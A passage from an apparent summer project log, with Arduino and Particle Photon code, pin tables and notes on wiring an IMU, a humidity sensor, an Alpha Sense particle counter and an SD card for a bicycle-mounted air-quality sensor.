Serial.print("x-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[0],1); Serial.println("% of factory value");
Serial.print("y-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[1],1); Serial.println("% of factory value");
Serial.print("z-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[2],1); Serial.println("% of factory value");
Serial.print("x-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[3],1); Serial.println("% of factory value");
Serial.print("y-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[4],1); Serial.println("% of factory value");
Serial.print("z-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[5],1); Serial.println("% of factory value");
// Calibrate gyro and accelerometers, load biases in bias registers
myIMU.calibrateMPU9250(myIMU.gyroBias, myIMU.accelBias);
myIMU.initMPU9250();
// Initialize device for active mode read of acclerometer, gyroscope, and
// temperature
Serial.println("MPU9250 initialized for active data mode....");
// Read the WHO_AM_I register of the magnetometer, this is a good test of
// communication
byte d = myIMU.readByte(AK8963_ADDRESS, WHO_AM_I_AK8963);
Serial.print("AK8963 "); Serial.print("I AM "); Serial.print(d, HEX);
Serial.print(" I should be "); Serial.println(0x48, HEX);
// Get magnetometer calibration from AK8963 ROM
myIMU.initAK8963(myIMU.magCalibration);
// Initialize device for active mode read of magnetometer
// Serial.println("Calibration values: ");
Serial.print("X-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[0], 2);
Serial.print("Y-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[1], 2);
Serial.print("Z-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[2], 2);
} // if (c == 0x73)
else
{
Serial.print("Could not connect to MPU9250: 0x");
Serial.println(c, HEX);
// while(1) ; // Loop forever if communication doesn't happen
}
}// End Initialize Gyro
void Read_Gyro()
{
if (myIMU.readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)
{
myIMU.readAccelData(myIMU.accelCount); // Read the x/y/z adc values
myIMU.getAres();
// Now we'll calculate the accleration value into actual g's
// This depends on scale being set
myIMU.ax = (float)myIMU.accelCount[0]*myIMU.aRes; // - accelBias[0];
myIMU.ay = (float)myIMU.accelCount[1]*myIMU.aRes; // - accelBias[1];
myIMU.az = (float)myIMU.accelCount[2]*myIMU.aRes; // - accelBias[2];
myIMU.readGyroData(myIMU.gyroCount); // Read the x/y/z adc values
myIMU.getGres();
// Calculate the gyro value into actual degrees per second
// This depends on scale being set
myIMU.gx = (float)myIMU.gyroCount[0]*myIMU.gRes;
myIMU.gy = (float)myIMU.gyroCount[1]*myIMU.gRes;
myIMU.gz = (float)myIMU.gyroCount[2]*myIMU.gRes;
myIMU.readMagData(myIMU.magCount); // Read the x/y/z adc values
myIMU.getMres();
// User environmental x-axis correction in milliGauss, should be
// automatically calculated
myIMU.magbias[0] = +470.;
// User environmental x-axis correction in milliGauss TODO axis??
myIMU.magbias[1] = +120.;
// User environmental x-axis correction in milliGauss
myIMU.magbias[2] = +125.;
// Calculate the magnetometer values in milliGauss
// Include factory calibration per data sheet and user environmental
// corrections
// Get actual magnetometer value, this depends on scale being set
myIMU.mx = (float)myIMU.magCount[0]*myIMU.mRes*myIMU.magCalibration[0] -
myIMU.magbias[0];
myIMU.my = (float)myIMU.magCount[1]*myIMU.mRes*myIMU.magCalibration[1] -
myIMU.magbias[1];
myIMU.mz = (float)myIMU.magCount[2]*myIMU.mRes*myIMU.magCalibration[2] -
myIMU.magbias[2];
} // if (readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)
// Must be called before updating quaternions!
myIMU.updateTime();
// Sensors x (y)-axis of the accelerometer is aligned with the y (x)-axis of
// the magnetometer; the magnetometer z-axis (+ down) is opposite to z-axis
// (+ up) of accelerometer and gyro! We have to make some allowance for this
// orientationmismatch in feeding the output to the quaternion filter. For the
// MPU-9250, we have chosen a magnetic rotation that keeps the sensor forward
// along the x-axis just like in the LSM9DS0 sensor. This rotation can be
// modified to allow any convenient orientation convention. This is ok by
// aircraft orientation standards! Pass gyro rate as rad/s
// MadgwickQuaternionUpdate(ax, ay, az, gx*PI/180.0f, gy*PI/180.0f, gz*PI/180.0f, my, mx, mz);
MahonyQuaternionUpdate(myIMU.ax, myIMU.ay, myIMU.az, myIMU.gx*DEG_TO_RAD,
myIMU.gy*DEG_TO_RAD, myIMU.gz*DEG_TO_RAD, myIMU.my,
myIMU.mx, myIMU.mz, myIMU.deltat);
myIMU.delt_t = millis() - myIMU.count;
if (myIMU.delt_t > 500)
{
// Print acceleration values in milligs!
String Acclerartion_X = String(1000*myIMU.ax);
String Acclerartion_Y = String(1000*myIMU.ay);
String Acclerartion_Z = String(1000*myIMU.az);
String Orientation_X = String(myIMU.gx, 3);
String Orientation_Y = String(myIMU.gy, 3);
String Orientation_Z = String(myIMU.gz, 3);
String Temprature = String(((float) myIMU.tempCount) / 333.87 + 21.0);
Serial.print("X-acceleration: "); Serial.print(1000*myIMU.ax);
Serial.print(" mg ");
Serial.print("Y-acceleration: "); Serial.print(1000*myIMU.ay);
Serial.print(" mg ");
Serial.print("Z-acceleration: "); Serial.print(1000*myIMU.az);
Serial.println(" mg ");
// Print gyro values in degree/sec
Serial.print("X-gyro rate: "); Serial.print(myIMU.gx, 3);
Serial.print(" degrees/sec ");
Serial.print("Y-gyro rate: "); Serial.print(myIMU.gy, 3);
Serial.print(" degrees/sec ");
Serial.print("Z-gyro rate: "); Serial.print(myIMU.gz, 3);
Serial.println(" degrees/sec");
// Print mag values in degree/sec
Serial.print("X-mag field: "); Serial.print(myIMU.mx);
Serial.print(" mG ");
Serial.print("Y-mag field: "); Serial.print(myIMU.my);
Serial.print(" mG ");
Serial.print("Z-mag field: "); Serial.print(myIMU.mz);
Serial.println(" mG");
myIMU.tempCount = myIMU.readTempData(); // Read the adc values
// Temperature in degrees Centigrade
myIMU.temperature = ((float) myIMU.tempCount) / 333.87 + 21.0;
// Print temperature in degrees Centigrade
Serial.print("Temperature is "); Serial.print(myIMU.temperature, 1);
Serial.println(" degrees C");
// Define output variables from updated quaternion---these are Tait-Bryan
// angles, commonly used in aircraft orientation. In this coordinate system,
// the positive z-axis is down toward Earth. Yaw is the angle between Sensor
// x-axis and Earth magnetic North (or true North if corrected for local
// declination, looking down on the sensor positive yaw is counterclockwise.
// Pitch is angle between sensor x-axis and Earth ground plane, toward the
// Earth is positive, up toward the sky is negative. Roll is angle between
// sensor y-axis and Earth ground plane, y-axis up is positive roll. These
// arise from the definition of the homogeneous rotation matrix constructed
// from quaternions. Tait-Bryan angles as well as Euler angles are
// non-commutative; that is, the get the correct orientation the rotations
// must be applied in the correct order which for this configuration is yaw,
// pitch, and then roll.
// For more see
// http://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
// which has additional links.
myIMU.yaw = atan2(2.0f * (*(getQ()+1) * *(getQ()+2) + *getQ() *
*(getQ()+3)), *getQ() * *getQ() + *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) - *(getQ()+3) * *(getQ()+3));
myIMU.pitch = -asin(2.0f * (*(getQ()+1) * *(getQ()+3) - *getQ() *
*(getQ()+2)));
myIMU.roll = atan2(2.0f * (*getQ() * *(getQ()+1) + *(getQ()+2) *
*(getQ()+3)), *getQ() * *getQ() - *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) + *(getQ()+3) * *(getQ()+3));
myIMU.pitch *= RAD_TO_DEG;
myIMU.yaw *= RAD_TO_DEG;
// Declination of SparkFun Electronics (40°05'26.6"N 105°11'05.9"W) is
// 8° 30' E ± 0° 21' (or 8.5°) on 2016-07-19
// - http://www.ngdc.noaa.gov/geomag-web/#declination
myIMU.yaw -= 8.5;
myIMU.roll *= RAD_TO_DEG;
Serial.print("Yaw, Pitch, Roll: ");
Serial.print(myIMU.yaw, 2);
Serial.print(", ");
Serial.print(myIMU.pitch, 2);
Serial.print(", ");
Serial.println(myIMU.roll, 2);
Serial.print("rate = ");
Serial.print((float)myIMU.sumCount/myIMU.sum, 2);
Serial.println(" Hz");
// Print acceleration values in milligs!
String Euler_Yaw = String(myIMU.yaw, 2);
String Euler_Pitch = String(myIMU.pitch, 2);
String Euler_Roll = String(myIMU.roll, 2);
String Euler_Frequency = String((float)myIMU.sumCount/myIMU.sum, 2);
// String Orientation_X = String(myIMU.gx, 3);
// String Orientation_Y = String(myIMU.gy, 3);
// String Orientation_Z = String(myIMU.gz, 3);
myIMU.count = millis();
myIMU.sumCount = 0;
myIMU.sum = 0;
}
}
void setup()
{
Serial.begin(9600);
delay(10000);
Initialize_Gyro();
}
void loop()
{
Read_Gyro();
delay(5000);
// If intPin goes high, all data registers have new data
// On interrupt, check if data ready interrupt
}
```
The code resulted in outputting the 3 axis acceleration, 3 axis orientation, and 3 axis megnetic feild readings. The following pin diagram was used.
| Due | MPU9250 | Description |
|------|---------|-------------|
| 5V | VCC | This board can also use 3.3V but first needs the solder jumper to be bridged, located next to the regulator.
| GND | GND |
| A1 | SCL | Pin 21 is the Due's default SCL pin
| A0 | SDA | Pin 20 is the Due's default SDA pin
| | EDA | Auxiliary pin, unused, frankly I did not figure out exactly what it does, very confident it's unused
| | ECL | Auxiliary pin, unused, frankly I did not figure out exactly what it does, very confident it's unused
| | AD0 | Changes the LSB of the address
| | INT | Interrupt output to controller, not used!
| 3V3 | NCS | Pull to high to enable I2C mode, to low for SPI
| GND | FSYNC | Frame sync, for use with a camera, not used! Should be grounded
## Aug 6
### Task 24 - Setting up the Temprature and Humidity Sensor
The HTU2ID is anither sensor which communicated using the I^2C Bus. The following code was implimented to get the Temprature and Humidity Readings.
```
// This #include statement was automatically added by the Particle IDE.
#include <HTU21D.h>
HTU21D htu = HTU21D();
// Taking care of the HTU sensor
void Initialize_HTU21D(){
if(! htu.begin()){
Serial.println("HTU21D not found");
delay(1000);
}else{
Serial.println("HTU21D OK");
}
}
void Read_HTU21D(){
Serial.print("Hum:"); Serial.println(htu.readHumidity());
Serial.print("Temp:"); Serial.println(htu.readTemperature());
// Reading HTU2ID Data - Temparature and Humidity * 100
}
void setup() {
Initialize_HTU21D();
}
void loop() {
Read_HTU21D();
delay(1000);
}
```
Since the RTC works works off an I<sup>2</sup>C interface, it utilizes the D0 and the D1 pins of the Photon.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN/3V3 | VCC |
| GND | GND |
## Aug 7-8
### Task 25 - Running the Particle with a Collection of Sensors
Since many sensors have been tried out thus far, it was time to check wheather they worked togeather on the photon. The devices to be connected togeather for this iteration of the main code is listed here.
| Device | Serial data link | Device Address |
|--------|------------------|----------------|
| RTC(PCF8523) | I<sup>2</sup>C | 0x68 |
| LCD Module(Smraza 2004) | I<sup>2</sup>C | 0x3F |
| Gyroscope(MPU9250) | I<sup>2</sup>C | 0x68/0x69 |
| GPS(NEO-6M) | RS232 TTL | - |
| SD Module(Adafruit) | SPI | - |
| Temprature/Humidity(HTU2ID) | I<sup>2</sup>C | 0x40 |
| Battery Pack | - | - |
Unfortunately, in default settings both the RTC and the Gyroscope happened to have the same setting. As such the AD0 pin on the is Gyroscope is pulled high to change its address to 0x69(from 0x68). To cater this modification the code snippet taken from the initial MPU9250 code was revised.
The revision is stated below.
The library of the said senor(SPARKFUN_MPU-9250) holds a file named *'MPU9250.h'*. This peice of code can be found there.
```
// Using the MPU-9250 breakout board, ADO is set to 0
// Seven-bit device address is 110100 for ADO = 0 and 110101 for ADO = 1
#define ADO 0
#if ADO
#define MPU9250_ADDRESS 0x69 // Device address when ADO = 1
#else
#define MPU9250_ADDRESS 0x68 // Device address when ADO = 0
#define AK8963_ADDRESS 0x0C // Address of magnetometer
#endif // AD0
```
Since this code is meant to used in an arduino, the follwing modification was done for it to be ran on the photon.
```
// Using the MPU-9250 breakout board, ADO is set to 0
#define MPU9250_ADDRESS 0x69 //
#define AK8963_ADDRESS 0x0C // Address of magnetometer
```
Once these modifications were done the code found in this **[link](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-8.ino)** was used to cater all the devices thus far used.
## Aug 9-10
### Task 25 - Running the Alpha Sensor on the Particle
#### Task 25.1 - Iteration 1
At this point having all the sensors connected to the Photon itself was considered. This would lead to the bike waggle being less expensive and less bulky. The Photon provided two SPI interfaces. The second SPIinterface was used to connect the Alpha Sense to the photon.
The following code was used in the implimentation.
```
// Alpha Sensor histogram
// Alphasensor
#define ALPHA_SLAVE_PIN D5
boolean flagON = false;
String AlphaBin0 ;
String AlphaBin1 ;
String AlphaBin2 ;
String AlphaBin3 ;
String AlphaBin4 ;
String AlphaBin5 ;
String AlphaBin6 ;
String AlphaBin7 ;
String AlphaBin8 ;
String AlphaBin9 ;
String AlphaBin10;
String AlphaBin11;
String AlphaBin12;
String AlphaBin13;
String AlphaBin14 ;
String AlphaBin15 ;
String AlphaBin16 ;
String AlphaBin17 ;
String AlphaBin18 ;
String AlphaBin19 ;
String AlphaBin20 ;
String AlphaBin21 ;
String AlphaBin22 ;
String AlphaBin23 ;
String AlphaBin24 ;
// Reading the PM values - PM*1000
String AlphaPM1 ;
String AlphaPM2_5;
String AlphaPM10 ;
//
bool Alpha_Status_Main = false;
bool Alpha_Status_Fan = false;
void Initialize_SPI1()
{
Serial.println("Initialization");
delay(20000);
Serial.println("Init Alpha ");
SPI1.begin(ALPHA_SLAVE_PIN);
SPI1.setBitOrder(MSBFIRST);
SPI1.setDataMode(SPI_MODE1);
SPI1.setClockSpeed(5000000);
delay(1000);
pinMode(ALPHA_SLAVE_PIN, OUTPUT);
Serial.println("Begining SPI");
}
bool Check_Alpha_Status(){
byte Alpha_Status_Byte;
int Repeats=0;
SPI1.beginTransaction(__SPISettings(5000000,MSBFIRST, SPI_MODE1));
digitalWrite(ALPHA_SLAVE_PIN, LOW);
SPI1.transfer(0xCF);
delay(10);
Alpha_Status_Byte = SPI1.transfer(0xCF);
// Rechecking
while(Alpha_Status_Byte!=0xF3&&(Repeats<10)){
delay(10);
Alpha_Status_Byte = SPI1.transfer(0xCF);
Repeats=Repeats+1;
}
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
SPI1.endTransaction();
// Give Status
Serial.println("Checking Status");
Serial.println(Alpha_Status_Byte,HEX);
if (Alpha_Status_Byte == 0xF3){
Serial.println("Sensor Ready to Transmit");
return true;
}else{
Serial.println("Sensor Failed to Initiate");
return false;
}
}
bool Turn_Alpha_On(){
byte Alpha_Status_Bytes[3];
byte expected[] = {0xF3, 0x03, 0x03};
Serial.println("Turning Alpha On");
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[0] = SPI1.transfer(0x03);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[1] = SPI1.transfer(0x03);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[2] = SPI1.transfer(0x03);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
Serial.println(Alpha_Status_Bytes[0],HEX);
Serial.println(Alpha_Status_Bytes[1],HEX);
Serial.println(Alpha_Status_Bytes[2],HEX);
return (Alpha_Status_Bytes==expected);
}
void Read_Alpha()
{
byte Alpha_Status_Bytes[2];
byte Alpha_Readings[86];
Serial.println("Reading Alpha Sensor Values");
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[0] = SPI1.transfer(0x30);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN, LOW);
Alpha_Status_Bytes[1] = SPI1.transfer(0x30);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
delay(10);
digitalWrite(ALPHA_SLAVE_PIN,LOW);
for (int i = 0; i<86; i++){
Alpha_Readings[i] = SPI1.transfer(0x30);
delayMicroseconds(10);
}
digitalWrite(ALPHA_SLAVE_PIN,HIGH);
Serial.println("Alpha Bytes");
Serial.println(Alpha_Status_Bytes[0],HEX);
Serial.println(Alpha_Status_Bytes[1],HEX);
Serial.println("Done Reading Alpha Values");
delay(1000);
for (int i = 0; i<86; i++){
Serial.println("Alplha Byte "+String(i)+" : "+String(Alpha_Readings[i]));
delay(10);
}
delay(1000);
for (int i = 0; i<48; i=i+2){
Serial.println("Bin Value "+String(i/2)+" : "+String(Get_Int_From_Bytes(Alpha_Readings[i],Alpha_Readings[i+1])));
delay(100);
}
Serial.println("Temprature: " +String(Alpha_Readings[56],HEX)+"|"+String(Alpha_Readings[57],HEX));
Serial.println("Humidity: " +String(Alpha_Readings[58],HEX)+"|"+String(Alpha_Readings[59],HEX));
Serial.println("SP: " +String(Alpha_Readings[52],HEX)+"|"+String(Alpha_Readings[53],HEX));
delay(1000);
int Temprature = Get_Int_From_Bytes(Alpha_Readings[56],Alpha_Readings[57]);
delay(1000);
int Humidity = Get_Int_From_Bytes(Alpha_Readings[58],Alpha_Readings[59]);
delay(1000);
int Sampling_Time = Get_Int_From_Bytes(Alpha_Readings[52],Alpha_Readings[53]);
delay(1000);
Serial.println("Temprature: " + String(Temprature));
delay(1000);
Serial.println("Humidity: " + String(Humidity));
delay(1000);
Serial.println("Sampling Time: " + String(Sampling_Time));
}
int Get_Int_From_Bytes(byte LSB, byte MSB)
{
int Least_Significant_Int = int(LSB);
int Most_Significant_Int = int(MSB);
// Combine two bytes into a 16-bit unsigned int
return ((Most_Significant_Int << 8) | Least_Significant_Int);
}
float Get_float_From_Bytes(byte val0, byte val1, byte val2, byte val3)
{
// Return an IEEE754 float from an array of 4 bytes
union u_tag {
byte b[4];
float val;
} u;
u.b[0] = val0;
u.b[1] = val1;
u.b[2] = val2;
u.b[3] = val3;
return u.val;
}
// EXAMPLE USAGE
void setup()
{
Serial.begin(9600);
Serial.println("Hello Computer");
delay(2000);
Serial.println("Serial Opening 1");
delay(2000);
Initialize_SPI1();
delay(2000);
Turn_Alpha_On() ;
delay(5000);
}
void loop() {
Read_Alpha();
delay(5000);
}
```
The Current code for the alpha sense reads byte values for the Histograms, PM, Sampling times, Temprature and Humidity. The next iteration will be implimented to convert this data to human readable form.
**NOTE: While the Temprature values and the Bin counts derived from the SPI interface made sense, the Humidity values did not match what was displayed on the Alpha Sense software. However this may not be of our concern, since we are using a seprate Humidity Sensor.**
**NOTE: On this iteration more often than not the Alpha Sensor read zeros as histogram counts. This concern will be addressed on the coming iterations**
## Aug 13-17
#### Task 25.2 - Iteration 2
Here the problem of alpha sensor reading zeros was looked into. It was found out that even the fan turned on, the laser withing the Alpha sense was not initited. This was solved using the code given below. Infact Alpha sense OPC N3, gave more control to the user so that the fan, the laser and the high/low gain options were user programmable.
```
void Initialize_Alpha(){
while (!Set_Fan_Digital_Pot_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Laser_Digital_Pot_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
while (!Set_Laser_Power_Switch_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Gain_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
// Resetting Histogram
Read_PM();
}
```
with this addition, a separate program was done to test the implimentation of the alpha sense.
```
#include "math.h"
// Alpha sensor histogram
// Alphasensor
#define ALPHA_SLAVE_PIN D5
boolean flagON = false;
String AlphaBin0 ;
String AlphaBin1 ;
String AlphaBin2 ;
String AlphaBin3 ;
String AlphaBin4 ;
String AlphaBin5 ;
String AlphaBin6 ;
String AlphaBin7 ;
String AlphaBin8 ;
String AlphaBin9 ;
String AlphaBin10;
String AlphaBin11;
String AlphaBin12;
String AlphaBin13;
String AlphaBin14 ;
String AlphaBin15 ;
String AlphaBin16 ;
String AlphaBin17 ;
String AlphaBin18 ;
String AlphaBin19 ;
String AlphaBin20 ;
String AlphaBin21 ;
String AlphaBin22 ;
String AlphaBin23 ;
String AlphaBin24 ;
// Reading the PM values - PM*1000
String AlphaPM1 ;
String AlphaPM2_5;
String AlphaPM10 ;
bool Alpha_Status_Fan = false;
byte Firmware_Major;
byte Firmware_Minor;
// EXAMPLE USAGE
void setup()
{
Serial.begin(9600);
delay(10000);
Serial.println("------------------");
Initialize_SPI1();
Initialize_Alpha();
delay(2000);
}
void loop() {
if (!Read_Alpha()) {
Serial.println("Failed to read histogram.");
delay(2500);
return;
}
delay(20000);
}
void Initialize_SPI1()
{
Serial.println("Initialization");
delay(2000);
Serial.println("Init SPI");
delay(2000);
SPI1.begin(ALPHA_SLAVE_PIN);
SPI1.setBitOrder(MSBFIRST);
SPI1.setDataMode(SPI_MODE1);
SPI1.setClockSpeed(300000);
delay(1000);
pinMode(ALPHA_SLAVE_PIN, OUTPUT);
Serial.println("Begining SPI");
}
void Initialize_Alpha(){
while (!Set_Fan_Digital_Pot_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Laser_Digital_Pot_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
while (!Set_Laser_Power_Switch_State(true)) {
Serial.println("Still trying to turn on device...");
delay(2500);
}
delay(5000);
// while (!Set_Gain_State(true)) {
// Serial.println("Still trying to turn on device...");
// delay(2500);
// }
// delay(5000);
// Resetting Histogram
Read_PM();
}
void beginTransfer() {
digitalWrite(ALPHA_SLAVE_PIN, LOW);
delay(1);
}
void endTransfer() {
delay(1);
digitalWrite(ALPHA_SLAVE_PIN, HIGH);
}
bool transferUntilMatch(byte send, byte want, unsigned long timeout) {
unsigned long startTime = millis();
while (millis() - startTime < timeout) {
if (SPI1.transfer(send) == want) {
return true;
}
delay(50);
}
return false;
}
byte transfer(byte send) {
return SPI1.transfer(send);
}
bool Set_Fan_Digital_Pot_State(bool powered) {
Serial.println("Setting Fan Digital Pot State");
beginTransfer();
if (!transferUntilMatch(0x03, 0xf3, 1000)) {
Serial.println("Power control timed out.");
return false;
}
delayMicroseconds(10);
if (powered) {
transfer(0x03);
} else {
transfer(0x02);
}
endTransfer();
return true;
}
bool Set_Laser_Digital_Pot_State(bool powered) {
Serial.println("Setting Laser Digital Pot State");
beginTransfer();
if (!transferUntilMatch(0x03, 0xf3, 1000)) {
Serial.println("Power control timed out.");
return false;
}
delayMicroseconds(10);
if (powered) {
transfer(0x05);
} else {
transfer(0x02);
}
endTransfer();
return true;
}
bool Set_Laser_Power_Switch_State(bool powered) {
Serial.println("Setting Laser Power Switch State");
beginTransfer();
if (!transferUntilMatch(0x03, 0xf3, 1000)) {
Serial.println("Power control timed out.");
return false;
}
delayMicroseconds(10);
if (powered) {
transfer(0x07);
} else {
transfer(0x02);
}
endTransfer();
return true;
}
bool Set_Gain_State(bool powered) {
Serial.println("Setting Laser Gain State");
beginTransfer();
if (!transferUntilMatch(0x03, 0xf3, 1000)) {
Serial.println("Power control timed out.");
return false;
}
delayMicroseconds(10);
if (powered) {
transfer(0x09);
} else {
transfer(0x02);
}
endTransfer();
return true;
}
bool Read_Alpha() {
byte Alpha_Readings[86];
beginTransfer();
if (!transferUntilMatch(0x30, 0xf3, 1000)) {
Serial.println("Histogram command failed.");
return false;
}
delay(10);
for (int i = 0; i<86; i++){
Alpha_Readings[i] = transfer(0x30);
delayMicroseconds(10);
}
endTransfer();
Serial.println("Histogram:");
for (int i = 0 ; i<86; i++) {
Serial.print(Alpha_Readings[i], HEX);
if (i % 10 == 9) {
Serial.print("\n");
} else {
Serial.print(" ");
}
}
Serial.println();
Serial.println("--------");
int Temprature = Get_Int_From_Bytes(Alpha_Readings[56],Alpha_Readings[57]);
int Humidity = Get_Int_From_Bytes(Alpha_Readings[58],Alpha_Readings[59]);
int Sampling_Time = Get_Int_From_Bytes(Alpha_Readings[52],Alpha_Readings[53]);
Serial.println("Temprature: " + String(Temprature));
Serial.println("Humidity: " + String(Humidity));
Serial.println("Sampling Time: " + String(Sampling_Time));
String pm1 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[60],Alpha_Readings[61],Alpha_Readings[62],Alpha_Readings[63]);
String pm2_5 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[64],Alpha_Readings[65],Alpha_Readings[66],Alpha_Readings[67]);
String pm10 = Get_Float_From_Bytes_Single_Precision(Alpha_Readings[68],Alpha_Readings[69],Alpha_Readings[70],Alpha_Readings[71]);
Serial.println("pm1 : " + String(pm1));
Serial.println("pm2_5: " + String(pm2_5));
Serial.println("pm10 : " + String(pm10));
Serial.println("-----------------------------------");
if(!(Alpha_Readings[0]== 0x00)){
return true;}
else{
return false;
}
}
bool Read_PM() {
byte Alpha_Readings[86];
beginTransfer();
if (!transferUntilMatch(0x32, 0xf3, 1000)) {
Serial.println("Histogram command failed.");
return false;
}
delay(10);
for (int i = 0; i<14; i++){
Alpha_Readings[i] = transfer(0x32);
delayMicroseconds(10);
}
endTransfer();
if(!(Alpha_Readings[0]== 0x00)){
return true;
Serial.println("Resetting Histogram");
}
else{
return false;
}
}
int Get_Int_From_Bytes(byte LSB, byte MSB)
{
int Least_Significant_Int = int(LSB);
int Most_Significant_Int = int(MSB);
// Combine two bytes into a 16-bit unsigned int
return ((Most_Significant_Int << 8) | Least_Significant_Int);
}
float Get_Exponent_Single_Precision(String Binary_String){
int Power_Pre=0;
int Power;
float Result;
for(int n=(Binary_String.length()-1);n>=0;n--){
if(Binary_String.charAt(n)=='1'){
Power_Pre = Power_Pre+pow(2,Binary_String.length()-1-n);
}
}
Power = Power_Pre -127;
if (Power>16){
Result = -1 ;
}else if (Power<-16){
Result = -2;
}else {
Result = pow(2,Power);
}
return Result;
}
float Get_Fraction_Single_Precision(String Binary_String){
float Final=1;
for(int n=0;n<Binary_String.length();n++){
if(Binary_String.charAt(n)=='1'){
Final = Final+pow(2,-(n+1));
}
}
return Final;
}
String Add_Leading_Bits_8(String Bits){
String Zeros = "00000000";
String Final;
if (Bits.length()<8)
{
Final = Zeros.substring(0,8-Bits.length())+Bits;
}
else{
Final = Bits ;
}
return Final;
}
String Get_Float_From_Bytes_Single_Precision(byte val0, byte val1, byte val2, byte val3)
{
String All_Binary = Add_Leading_Bits_8(String(val3,BIN))+ Add_Leading_Bits_8(String(val2,BIN))+ Add_Leading_Bits_8(String(val1,BIN))+ Add_Leading_Bits_8(String(val0,BIN));
// //String All_Binary ="01000000110110011001100110011010";
Serial.println("Binary Value :"+ All_Binary) ;
String Sign_Binary = All_Binary.substring(0,1);
String Exponent_Binary = All_Binary.substring(1,9);
String Fraction_Binary = All_Binary.substring(9,32);
float Exponent = Get_Exponent_Single_Precision(Exponent_Binary);
float Fraction = Get_Fraction_Single_Precision(Fraction_Binary);
if (Exponent>0){
float Float_Value = Exponent*Fraction;
return String(Float_Value);
}
else if (Exponent==-1){
Serial.println("VTL") ;
return "VTL";
}
else if(Exponent==-2)
{
Serial.println("VTS") ;
return "0";
}else{
Serial.println("Error") ;
return "Error";
}
}
bool Compare(byte array1[], byte array2[], int length) {
for (int i = 0; i < length; i++){
if (array1[i] != array2[i]) {
return false;
}
}
return true;
}
```
## Aug 20-23
#### Task 26 - Finalized SD Card Implilmentation
The previos code for the handling of the SD works only on publishing data to the SD card. For this iteration the SD has the capability to publish the data to the cloud while deleting whats being published. The final code for the SD Card implimentation is given here.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
SdFat sd;
SdFile file;
String Bike_Waggle_ID = "Lakithas_Photon";
const uint8_t chipSelect = A2;
//------------------------------------------------------------------------------
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
File myFile;
// File about to be Publishedd
int Sensorgram_Publish_Index;
// File about to be read
int Sensorgram_Reading_Index;
void setup() {
Initialize_Serial();
delay(10000);
Initialize_SD();
delay(1000);
//Sensogram_Publisher();
}
void loop() {
Serial.println("Reading Index"+String(Sensorgram_Reading_Index));
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Write_Data_To_Sensorgram_Waggle(" Hello Sensorgam");
Publish_Data_To_Cloud_Waggle();
//Publish_Data_To_Cloud_Waggle();
delay(5000);
}
void Initialize_Serial(){
Serial.begin(9600);
// Wait for USB Serial
}
// SD Card functions
void Initialize_SD(){
if (sd.begin(chipSelect, SPI_HALF_SPEED)) {
Serial.println("SD Initiated");
}else{
Serial.println("SD Initiated");
}
// Create a new folder.
if (sd.mkdir(Bike_Waggle_ID+"_Data")) {
Serial.println("Data Folder Created");
}else{
Serial.println("Data Folder not Created");
}
// Create a new folder for sensorgram.
if (sd.mkdir(Bike_Waggle_ID+"_Sensorgram")) {
Serial.println("Sensorgram Folder Created");
}else{
Serial.println("Sensorgram Folder Creation Failed");
}
//Printing Headers
Serial.println("Data File Opended");
Write_Data_To_SD_Waggle("# Project Bike Waggle");
Write_Data_To_SD_Waggle("# Version 1.0");
Write_Data_To_SD_Waggle("# Bike Waggle - "+Bike_Waggle_ID);
// DateTime now = rtc.now();
Write_Data_To_SD_Waggle("# Logs begin at " + Time.timeStr());
Write_Data_To_SD_Waggle("# <Date_Time>,<Sensor>,<Parametor>,<Data>");
// Doing the Index for the Reading File
if (sd.exists(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt"))
{
Serial.println("File Already Exists");
Sensorgram_Reading_Index = atoi(Read_Data_from_SD(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt"));
} else{
Serial.println("File Does Not Exist");
myFile.open(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt", O_CREAT | O_WRITE | O_AT_END) ;
